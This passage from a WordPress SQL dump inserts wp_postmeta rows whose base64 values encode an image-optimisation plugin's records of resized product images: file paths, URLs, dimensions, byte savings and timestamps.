cL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NwZWNpYWx0eS1wcm9kdWN0cy03Njh4MTE1Mi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjExNTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc3BlY2lhbHR5LXByb2R1Y3RzLTc2OHgxMTUyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NwZWNpYWx0eS1wcm9kdWN0cy03Njh4MTE1Mi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODYyNzEsImlkIjo0ODV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc3BlY2lhbHR5LXByb2R1Y3RzLTEwNjd4MTYwMC5qcGciLCJ3aWR0aCI6MTA2NywiaGVpZ2h0IjoxNjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NwZWNpYWx0eS1wcm9kdWN0cy0xMDY3eDE2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc3BlY2lhbHR5LXByb2R1Y3RzLTEwNjd4MTYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODYyNzQsImlkIjo0ODV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc3BlY2lhbHR5LXByb2R1Y3RzLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc3BlY2lhbHR5LXByb2R1Y3RzLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc3BlY2lhbHR5LXByb2R1Y3RzLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg2Mjc2LCJpZCI6NDg1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NwZWNpYWx0eS1wcm9kdWN0cy0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NwZWNpYWx0eS1wcm9kdWN0cy0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NwZWNpYWx0eS1wcm9kdWN0cy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NjI3OSwiaWQiOjQ4NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zcGVjaWFsdHktcHJvZHVjdHMtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zcGVjaWFsdHktcHJvZHVjdHMtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zcGVjaWFsdHktcHJvZHVjdHMtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODYyODEsImlkIjo0ODV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc3BlY2lhbHR5LXByb2R1Y3RzLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc3BlY2lhbHR5LXByb2R1Y3RzLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc3BlY2lhbHR5LXByb2R1Y3RzLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg2Mjg0LCJpZCI6NDg1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc3BlY2lhbHR5LXByb2R1Y3RzLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc3BlY2lhbHR5LXByb2R1Y3RzLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc3BlY2lhbHR5LXByb2R1Y3RzLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxMDIsInRpbWUiOjE0ODM1ODYyODYsImlkIjo0ODV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zcGVjaWFsdHktcHJvZHVjdHMtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zcGVjaWFsdHktcHJvZHVjdHMtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zcGVjaWFsdHktcHJvZHVjdHMtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODYyODgsImlkIjo0ODV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zcGVjaWFsdHktcHJvZHVjdHMtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zcGVjaWFsdHktcHJvZHVjdHMtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zcGVjaWFsdHktcHJvZHVjdHMtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODYyOTEsImlkIjo0ODV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zcGVjaWFsdHktcHJvZHVjdHMtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zcGVjaWFsdHktcHJvZHVjdHMtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zcGVjaWFsdHktcHJvZHVjdHMtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODYyOTMsImlkIjo0ODV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zcGVjaWFsdHktcHJvZHVjdHMtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zcGVjaWFsdHktcHJvZHVjdHMtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zcGVjaWFsdHktcHJvZHVjdHMtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODYyOTYsImlkIjo0ODV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zcGVjaWFsdHktcHJvZHVjdHMtNjAweDYwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zcGVjaWFsdHktcHJvZHVjdHMtNjAweDYwMC5qcGciLCJ3aWR0aCI6IjYwMCIsImhlaWdodCI6IjYwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zcGVjaWFsdHktcHJvZHVjdHMtNjAweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODYyOTksImlkIjo0ODV9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30183, 429, 'wpfc_optimisation_reduction', '1639'); 
INSERT INTO `wp_postmeta` VALUES (30184, 429, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC1lMTQ3MTUzMjE3OTU3Mi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtZTE0NzE1MzIxNzk1NzIuanBnIiwid2lkdGgiOjQ1MiwiaGVpZ2h0IjoyNDYsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTY0LWUxNDcxNTMyMTc5NTcyLmpwZyIsInJlZHVjdGlvbiI6MTQ3MSwidGltZSI6MTQ4MzU4NjMwNiwiaWQiOiI0MjkifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtZTE0NzE1MzIxNzk1NzItMzQweDI0Ni5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjI0NiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY0LWUxNDcxNTMyMTc5NTcyLTM0MHgyNDYuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy02NC1lMTQ3MTUzMjE3OTU3Mi0zNDB4MjQ2LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NjMwOCwiaWQiOjQyOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY0LWUxNDcxNTMyMTc5NTcyLTI1MHgyNDYuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNDYsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC1lMTQ3MTUzMjE3OTU3Mi0yNTB4MjQ2LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tNjQtZTE0NzE1MzIxNzk1NzItMjUweDI0Ni5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODYzMTAsImlkIjo0Mjl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC1lMTQ3MTUzMjE3OTU3Mi0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtZTE0NzE1MzIxNzk1NzItMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTY0LWUxNDcxNTMyMTc5NTcyLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg2MzEzLCJpZCI6NDI5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtZTE0NzE1MzIxNzk1NzItMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY0LWUxNDcxNTMyMTc5NTcyLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy02NC1lMTQ3MTUzMjE3OTU3Mi0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NjMxNSwiaWQiOjQyOX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtZTE0NzE1MzIxNzk1NzItMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY0LWUxNDcxNTMyMTc5NTcyLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy02NC1lMTQ3MTUzMjE3OTU3Mi0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6MTQwLCJ0aW1lIjoxNDgzNTg2MzE3LCJpZCI6NDI5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC1lMTQ3MTUzMjE3OTU3Mi0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtZTE0NzE1MzIxNzk1NzItMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTY0LWUxNDcxNTMyMTc5NTcyLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoyMSwidGltZSI6MTQ4MzU4NjMxOSwiaWQiOjQyOX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtZTE0NzE1MzIxNzk1NzItMjQ3eDI0Ni5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY0LWUxNDcxNTMyMTc5NTcyLTI0N3gyNDYuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIyNDYiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy02NC1lMTQ3MTUzMjE3OTU3Mi0yNDd4MjQ2LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NjMyMSwiaWQiOjQyOX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtZTE0NzE1MzIxNzk1NzItMzAweDI0Ni5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY0LWUxNDcxNTMyMTc5NTcyLTMwMHgyNDYuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIyNDYiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy02NC1lMTQ3MTUzMjE3OTU3Mi0zMDB4MjQ2LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NjMyMywiaWQiOjQyOX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtZTE0NzE1MzIxNzk1NzItNDAweDI0Ni5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY0LWUxNDcxNTMyMTc5NTcyLTQwMHgyNDYuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiIyNDYiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy02NC1lMTQ3MTUzMjE3OTU3Mi00MDB4MjQ2LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NjMyNSwiaWQiOjQyOX1d'); 
INSERT INTO `wp_postmeta` VALUES (30185, 426, 'wpfc_optimisation_reduction', '21275'); 
INSERT INTO `wp_postmeta` VALUES (30186, 426, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUmVsZWFTeXM4OS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JlbGVhU3lzODkuanBnIiwid2lkdGgiOjU2MTYsImhlaWdodCI6Mzc0NCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4NjMzMCwiaWQiOiI0MjYifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JlbGVhU3lzODktMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SZWxlYVN5czg5LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUmVsZWFTeXM4OS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6ODAzLCJ0aW1lIjoxNDgzNTg2MzM0LCJpZCI6NDI2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JlbGVhU3lzODktODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SZWxlYVN5czg5LTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUmVsZWFTeXM4OS04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MjAzMywidGltZSI6MTQ4MzU4NjMzOCwiaWQiOjQyNn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SZWxlYVN5czg5LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUmVsZWFTeXM4OS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1JlbGVhU3lzODktNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjE4OTcsInRpbWUiOjE0ODM1ODYzNDIsImlkIjo0MjZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUmVsZWFTeXM4OS0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SZWxlYVN5czg5LTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl